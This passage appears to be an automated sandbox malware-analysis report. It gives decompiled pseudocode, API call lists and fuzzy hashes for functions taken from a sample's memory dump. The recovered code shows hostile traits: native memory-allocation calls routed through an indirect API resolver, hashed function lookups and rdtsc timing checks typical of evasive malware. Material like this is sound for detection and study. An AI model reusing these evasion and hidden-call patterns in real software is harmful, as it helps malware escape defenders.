                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: d7ba9f62a806b2787265f0847ae47cc35efeb68c0e1ba99237bc1b3d0184de37
                        • Instruction ID: ec215353cca3a6878de4362678391beda19c1c878c6b2facfe8b3faf2a10b490
                        • Opcode Fuzzy Hash: d7ba9f62a806b2787265f0847ae47cc35efeb68c0e1ba99237bc1b3d0184de37
                        • Instruction Fuzzy Hash: CFF0E2B2214149ABCB08CF99D884CEB77ADFF8C354B15864DFA1D93202D634E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 284 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                        C-Code - Quality: 79%
                        			E0041A4FB(void* __eax, void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                        				long _t17;
                        				void* _t28;
                        
                        				asm("insd");
                        				_t13 = _a4;
                        				_t4 = _t13 + 0xc60; // 0xca0
                        				E0041AF20(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                        				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                        				return _t17;
                        			}






                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e612f15f6f2267441e04731130d5a6bfe39a5d9b5473ed0ba4227a773dcbf824
                        • Instruction ID: e820be8047e91d5337914ac408771f2378100c9e5cea71a21508ab3de16f6a79
                        • Opcode Fuzzy Hash: e612f15f6f2267441e04731130d5a6bfe39a5d9b5473ed0ba4227a773dcbf824
                        • Instruction Fuzzy Hash: ACF0F8B2210218ABCB14DF89DC81EEB77ADAF8C754F118259BA1997281C630E911CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                        				long _t14;
                        				void* _t21;
                        
                        				_t3 = _a4 + 0xc60; // 0xca0
                        				E0041AF20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                        				return _t14;
                        			}






                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A450(intOrPtr _a4, void* _a8) {
                        				long _t8;
                        				void* _t11;
                        
                        				_t5 = _a4;
                        				_t2 = _t5 + 0x10; // 0x300
                        				_t3 = _t5 + 0xc50; // 0x40a933
                        				E0041AF20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                        				_t8 = NtClose(_a8); // executed
                        				return _t8;
                        			}






                        APIs
                        • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00409AA0(intOrPtr _a4) {
                        				intOrPtr _v8;
                        				char _v24;
                        				char _v284;
                        				char _v804;
                        				char _v840;
                        				void* _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t39;
                        				void* _t50;
                        				intOrPtr _t52;
                        				void* _t53;
                        				void* _t54;
                        				void* _t55;
                        				void* _t56;
                        
                        				_t52 = _a4;
                        				_t39 = 0; // executed
                        				_t24 = E00407EA0(_t52,  &_v24); // executed
                        				_t54 = _t53 + 8;
                        				if(_t24 != 0) {
                        					E004080B0( &_v24,  &_v840);
                        					_t55 = _t54 + 8;
                        					do {
                        						E0041BDD0( &_v284, 0x104);
                        						E0041C440( &_v284,  &_v804);
                        						_t56 = _t55 + 0x10;
                        						_t50 = 0x4f;
                        						while(1) {
                        							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
                        							_t56 = _t56 + 0x10;
                        							if(_t31 != 0) {
                        								break;
                        							}
                        							_t50 = _t50 + 1;
                        							if(_t50 <= 0x62) {
                        								continue;
                        							} else {
                        							}
                        							goto L8;
                        						}
                        						_t9 = _t52 + 0x14; // 0xffffe055
                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                        						_t39 = 1;
                        						L8:
                        						_t33 = E004080E0( &_v24,  &_v840);
                        						_t55 = _t56 + 8;
                        					} while (_t33 != 0 && _t39 == 0);
                        					_t34 = E00408160(_t52,  &_v24); // executed
                        					if(_t39 == 0) {
                        						asm("rdtsc");
                        						asm("rdtsc");
                        						_v8 = _t34 - 0 + _t34;
                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                        					}
                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                        					_t20 = _t52 + 0x31; // 0x5608758b
                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                        					return 1;
                        				} else {
                        					return _t24;
                        				}
                        			}




















                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                        • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                        • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                        • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6 41a5f0-41a621 call 41af20 RtlAllocateHeap
                        C-Code - Quality: 100%
                        			E0041A5F0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                        				void* _t10;
                        				void* _t15;
                        
                        				E0041AF20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                        				_t6 =  &_a8; // 0x414526
                        				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                        				return _t10;
                        			}





                        0x0041a607
                        0x0041a612
                        0x0041a61d
                        0x0041a621

                        APIs
                        • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: &EA
                        • API String ID: 1279760036-1330915590
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 204 408308-40831f 205 408328-40835a call 41c9c0 call 40ace0 call 414e40 204->205 206 408323 call 41be20 204->206 213 40835c-40836e PostThreadMessageW 205->213 214 40838e-408392 205->214 206->205 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                        C-Code - Quality: 73%
                        			E00408308(void* __eax, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, long _a8) {
                        				char _v67;
                        				char _v68;
                        				void* _v117;
                        				void* _t16;
                        				int _t17;
                        				long _t30;
                        				int _t35;
                        				void* _t38;
                        				void* _t40;
                        
                        				_t38 = _t40;
                        				_v68 = 0;
                        				E0041BE20( &_v67, 0, 0x3f);
                        				E0041C9C0( &_v68, 3);
                        				_t16 = E0040ACE0(_a4 + 0x1c,  &_v68); // executed
                        				_t17 = E00414E40(_a4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
                        				_t35 = _t17;
                        				if(_t35 != 0) {
                        					_push(0x6519c7e4);
                        					_t30 = _a8;
                        					_t17 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
                        					_t47 = _t17;
                        					if(_t17 == 0) {
                        						_t17 =  *_t35(_t30, 0x8003, _t38 + (E0040A470(_t47, 1, 8) & 0x000000ff) - 0x40, _t17);
                        					}
                        				}
                        				return _t17;
                        			}













                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: e67b4a49b9e0c07a45658d3cee0be7f900f0b267e2f7f7c02acac5457fda6d52
                        • Instruction ID: d0f6cd01bfff6c5bced5e97e9eb8c95343b9b688216560f9dd970d4a7c454c49
                        • Opcode Fuzzy Hash: e67b4a49b9e0c07a45658d3cee0be7f900f0b267e2f7f7c02acac5457fda6d52
                        • Instruction Fuzzy Hash: 94012D71A8031877E720A6A58C43FFE6B2C5F40B54F04011EFF04FB1C1D6E9690546E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 219 408310-40831f 220 408328-40835a call 41c9c0 call 40ace0 call 414e40 219->220 221 408323 call 41be20 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                        C-Code - Quality: 82%
                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                        				char _v67;
                        				char _v68;
                        				void* _t12;
                        				intOrPtr* _t13;
                        				int _t14;
                        				long _t21;
                        				intOrPtr* _t25;
                        				void* _t26;
                        
                        				_v68 = 0;
                        				E0041BE20( &_v67, 0, 0x3f);
                        				E0041C9C0( &_v68, 3);
                        				_t12 = E0040ACE0(_a4 + 0x1c,  &_v68); // executed
                        				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                        				_t25 = _t13;
                        				if(_t25 != 0) {
                        					_t21 = _a8;
                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                        					_t32 = _t14;
                        					if(_t14 == 0) {
                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                        					}
                        					return _t14;
                        				}
                        				return _t13;
                        			}












                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                        • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                        • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                        • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 234 4082a6-4082ac 235 408328-40835a call 41c9c0 call 40ace0 call 414e40 234->235 236 4082ae-4082af 234->236 243 40835c-40836e PostThreadMessageW 235->243 244 40838e-408392 235->244 236->235 245 408370-40838a call 40a470 243->245 246 40838d 243->246 245->246 246->244
                        C-Code - Quality: 69%
                        			E004082A6(void* __ebx, intOrPtr* _a4, intOrPtr _a8, long _a12) {
                        				char _v64;
                        				void* _t9;
                        				int _t10;
                        				void* _t21;
                        				void* _t24;
                        				long _t27;
                        				int _t31;
                        				void* _t33;
                        
                        				asm("sbb esi, [eax-0x4e]");
                        				if(__ebx + _t33 != 0) {
                        					E0041C9C0( &_v64, 3);
                        					_t9 = E0040ACE0(_a8 + 0x1c,  &_v64); // executed
                        					_t10 = E00414E40(_a8 + 0x1c, _t9, 0, 0, 0xc4e7b6d6);
                        					_t31 = _t10;
                        					__eflags = _t31;
                        					if(_t31 != 0) {
                        						_t27 = _a12;
                        						_t10 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
                        						__eflags = _t10;
                        						if(__eflags == 0) {
                        							_t10 =  *_t31(_t27, 0x8003, _t33 + (E0040A470(__eflags, 1, 8) & 0x000000ff) - 0x40, _t10);
                        						}
                        					}
                        					return _t10;
                        				} else {
                        					_push(_t33);
                        					_t24 = E0041B730(_t21);
                        					if(_t24 == 0 || _t24 == 0x33333333) {
                        						__eflags = 0;
                        						return 0;
                        					} else {
                        						return  *_a4 + _t24;
                        					}
                        				}
                        			}












                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 6aaabfd5a16b850eb69c1c12a248f6091afa7c6f0458af8c1e3d292dd8942bc1
                        • Instruction ID: 037cbf3ae9f420d5129a02319aedae942565b592f2a8777cea9704e2e8a68ef6
                        • Opcode Fuzzy Hash: 6aaabfd5a16b850eb69c1c12a248f6091afa7c6f0458af8c1e3d292dd8942bc1
                        • Instruction Fuzzy Hash: 4D01F972A8032876E7105A509C43FFE7318AB80F14F05012EFF04FB1C1D5B9290606E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 264 41a738-41a73d 265 41a73f-41a759 264->265 266 41a7be-41a7c4 LookupPrivilegeValueW 264->266 267 41a75f-41a780 265->267 268 41a75a call 41af20 265->268 268->267
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 542f340034508ee5ee54ed64a196dc1cd56a6af149c9b9cabecb4b50a495cbe3
                        • Instruction ID: 872b5fda29e4cbfa600bdd44972183829caad272b32237683a56f9c650899d65
                        • Opcode Fuzzy Hash: 542f340034508ee5ee54ed64a196dc1cd56a6af149c9b9cabecb4b50a495cbe3
                        • Instruction Fuzzy Hash: 03F067B6200108AFCB14DFA9DC80EEB37ADEF88354F00825AFA0C97241C630E815CBB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 276 41a6fd-41a6fe 277 41a700-41a734 call 41af20 276->277 278 41a682-41a69c call 41af20 ExitProcess 276->278
                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 8200540e889aab06b42adc1a2ab9cb0077acd4e90c93de7f2c20bd0016404ca2
                        • Instruction ID: a934600f091833ecacb74bbb3d7bb1206aecee0922428eb6f37b16634cef80d1
                        • Opcode Fuzzy Hash: 8200540e889aab06b42adc1a2ab9cb0077acd4e90c93de7f2c20bd0016404ca2
                        • Instruction Fuzzy Hash: 39F05EB16012046BDB10EFA9CC85EE737ADEF88714F058559FD186B202C934ED118BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 287 41a781-41a78c 288 41a7ad-41a7bc 287->288 289 41a78e-41a7aa call 41af20 287->289 291 41a7be-41a7c4 LookupPrivilegeValueW 288->291 289->288
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 896a0f2a9804b7cc9b542f646fc39b89f94c70de8e344e7d2b9837168f29a886
                        • Instruction ID: b94939cd9a20de2c40e5b0936aafe30322abe83aeacba9d68ad797e1460e56a0
                        • Opcode Fuzzy Hash: 896a0f2a9804b7cc9b542f646fc39b89f94c70de8e344e7d2b9837168f29a886
                        • Instruction Fuzzy Hash: A2F0A0B62012146FCB11DF45CC41EE73B699F46314F018596F90D57243D535E915C7B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 40%
                        			E0041A622(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t12;
                        				void* _t17;
                        
                        				0x9433();
                        				asm("fidivr dword [ebp+0x55ce3c20]");
                        				_t9 = _a4;
                        				_t3 = _t9 + 0xc74; // 0xc74
                        				E0041AF20(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t12;
                        			}






                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 0d616628c167f1c377f5eb2043bc9643f064c628a8bfec2fef802906ef755510
                        • Instruction ID: 558fd1e1b32101dcb4a0f0fb8f4cc6f4991fda9ca6b5a7a5012df12808b698d8
                        • Opcode Fuzzy Hash: 0d616628c167f1c377f5eb2043bc9643f064c628a8bfec2fef802906ef755510
                        • Instruction Fuzzy Hash: 76E06DB1210308ABCB14EF95CC45EDB33A8AF88314F118545FD185B241C631E851CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t10;
                        				void* _t15;
                        
                        				_t3 = _a4 + 0xc74; // 0xc74
                        				E0041AF20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}





                        0x0041a63f
                        0x0041a647
                        0x0041a65d
                        0x0041a661

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                        • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                        				intOrPtr* _t8;
                        				int _t10;
                        				void* _t15;
                        
                        				_t8 = E0041AF20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                        				 *_t8 =  *_t8 + _t8;
                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}






                        0x0041a7aa
                        0x0041a7ad
                        0x0041a7c0
                        0x0041a7c4

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                        • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                        • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
                        • Instruction ID: c1221fc992dd787324de96086fbf26e93045d9467701d9422779042349688f23
                        • Opcode Fuzzy Hash: f70bcf56cb69372f97621f00c904547e8f0c00941ce3998ab6fd1aa7f2f5f90f
                        • Instruction Fuzzy Hash: FFD0A7716002007FD720DF68CC85FD73B68DF48354F018169B91CAB241C531EA01CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1ea347f2521e7c9f7e1865d0014194ef56e2f18ef442dfa890a1e188c5055467
                        • Instruction ID: 6c5d6e8dee61ada36054c386bf8428c5d0431cf6645ade3b9aef6b44bc7017b5
                        • Opcode Fuzzy Hash: 1ea347f2521e7c9f7e1865d0014194ef56e2f18ef442dfa890a1e188c5055467
                        • Instruction Fuzzy Hash: 77C08032502405C5D5153F6D78501F4F768DF47634F001B97E8E493DE0A686C4514284
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040E472(void* __eax, void* __edx) {
                        				signed int _t9;
                        
                        				 *(__edx - 0x1b) =  *(__edx - 0x1b) ^ _t9;
                        				return __eax;
                        			}




                        0x0040e473
                        0x0040e480

                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e81cabe3ccf5af523a966cfde47bf896e8d276dbccfe718632209b2265fa5f4f
                        • Instruction ID: fc53ef27ae9d289d12e758ac6865afd34162bd1fc96e3f1f974efe5d1e462851
                        • Opcode Fuzzy Hash: e81cabe3ccf5af523a966cfde47bf896e8d276dbccfe718632209b2265fa5f4f
                        • Instruction Fuzzy Hash: 90B0122BF050088244248C5974410B4F330F283033E1132EBCD0CF35001413D11001CD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E00D738A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				signed int* _t82;
                        				signed int _t86;
                        				long _t90;
                        				void* _t91;
                        				intOrPtr _t94;
                        				signed int _t98;
                        				signed int _t99;
                        				signed char _t103;
                        				void** _t105;
                        				void** _t106;
                        				void** _t109;
                        				signed char _t111;
                        				long _t119;
                        				void* _t129;
                        				signed int* _t133;
                        				void* _t135;
                        				signed int* _t138;
                        				void** _t139;
